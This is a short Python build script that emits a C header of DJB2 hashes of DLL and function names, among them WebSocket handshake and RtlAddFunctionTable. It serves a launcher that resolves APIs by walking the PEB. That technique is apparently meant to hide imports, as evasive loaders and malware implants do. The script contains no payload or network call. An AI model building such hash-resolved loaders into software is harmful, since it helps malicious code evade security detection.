#!/usr/bin/env python3
"""Emit hash_defs.h with DJB2 hashes for the launcher's PEB-walk resolver.

Matches peb_walk.c: djb2(seed=5381, poly=131). DLL names are hashed as
lowercase ASCII to match the runtime BaseDllName casing normalization.
"""
import sys

# name → (string_to_hash, is_dll_name)
HASHES = [
    ("HASH_WEBIO",           "webio.dll",                     True),
    ("HASH_COMBASE",         "combase.dll",                   True),
    ("HASH_NTDLL",           "ntdll.dll",                     True),
    ("HASH_WEBSOCKET_BEGIN", "WebSocketBeginClientHandshake", False),
    ("HASH_COUNINIT",        "CoUninitialize",                False),
    ("HASH_RTLADD",          "RtlAddFunctionTable",           False),
]


def djb2(s: bytes) -> int:
    h = 5381
    for c in s:
        h = ((h * 131) + c) & 0xFFFFFFFFFFFFFFFF
    return h


def main(out_path: str = "hash_defs.h") -> None:
    lines = [
        "/* Auto-generated by gen_hashes.py — do not edit. */",
        "#ifndef HASH_DEFS_H",
        "#define HASH_DEFS_H",
        "",
    ]
    for name, value, is_dll in HASHES:
        s = value.lower() if is_dll else value
        lines.append(f"#define {name} 0x{djb2(s.encode()):016x}ULL  /* {value} */")
    lines += ["", "#endif /* HASH_DEFS_H */", ""]
    with open(out_path, "w") as f:
        f.write("\n".join(lines))
    print(f"[+] Wrote {out_path} ({len(HASHES)} hashes)")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "hash_defs.h")
